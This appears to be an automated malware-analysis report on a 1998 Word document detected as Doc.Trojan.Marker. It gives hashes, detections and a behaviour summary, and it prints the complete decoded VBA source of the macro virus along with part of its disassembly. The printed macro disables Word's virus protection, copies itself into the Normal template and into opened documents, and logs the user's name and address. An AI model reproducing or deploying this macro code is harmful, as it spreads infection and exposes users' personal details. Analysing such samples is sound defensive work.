Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ec4c0cc2c7e58a5…

MALICIOUS

Office (OLE)

30.0 KB Created: 1998-11-30 17:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 583ddc8a6b4525d5608898c0af3255e9 SHA-1: ef3a2f05f746b772db1ff069196e76ec0d1bb79d SHA-256: 1ec4c0cc2c7e58a54edfe2b74459f8d16fba69eaed927766deef20d9e662221d
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The macro code attempts to infect the Normal.dot template by exporting its own code to 'c:\netldv.vxd' and then likely copying it to the template. This behavior is indicative of a macro-based malware dropper or worm aiming for persistence.

Heuristics 2

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9811 bytes
SHA-256: e81be6dd1b041d13f3efb85b83270b6b5005d81117ee60537cb5f90fe5d921ad
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"
Const ExportFile = "c:\netldv.vxd"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim UserAddress As String


'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    ad.Export ExportFile                    'Export from the ActiveDocument

    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    Open ExportFile For Append As #1
    Print #1, "' " & Format(Time, "hh:mm:ss AMPM - ") & _
              Format(Date, "dddd, d mmm yyyy") & _
              Chr(13) & "' " & Application.UserName & _
              Chr(13) & "' " & UserAddress
    Close #1
    
    
    nt.CodeModule.AddFromFile ExportFile    'Import into the NormalTemplate
    nt.CodeModule.DeleteLines 1, 4          'Remove some unnessesary lines
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    nt.Export ExportFile                    'Export from the NormalTemplate
    ad.CodeModule.AddFromFile ExportFile    'Import into the ActiveDocument
    ad.CodeModule.DeleteLines 1, 4          'Remove some unnessesary lines
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
    
    
  Kill ExportFile                           'Delete the file which
                                            'stores the virus's
                                            'source code

End If

End Sub

' 08:26:42  - Sonntag, 22 Nov 1998
' SPo0Ky
' Blue Planet






' Processing file: /opt/analyzer/scan_staging/379a25734294491189cb50f4b8e066e6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5325 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	Dim (Const) 
' 	LitStr 0x0014 "<- this is a marker!"
' 	VarDefn Marker
' Line #5:
' 	Dim (Const) 
' 	LitStr 0x000D "c:\netldv.vxd"
' 	VarDefn ExportFile
' Line #6:
' Line #7:
' 	QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #8:
' 	Dim 
' 	VarDefn SaveDocument
' 	VarDefn SaveNormalTemplate
' 	VarDefn DocumentInfected
' 	VarDefn NormalTemplateInfected (As Boolean)
' Line #9:
' 	Dim 
' 	VarDefn ad
' 	VarDefn nt (As Object)
' Line #10:
' 	Dim 
' 	VarDefn UserAddress (As String)
' Line #11:
' Line #12:
' Line #13:
' 	QuoteRem 0x0000 0x0014 "Initialize Variables"
' Line #14:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	Mem
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.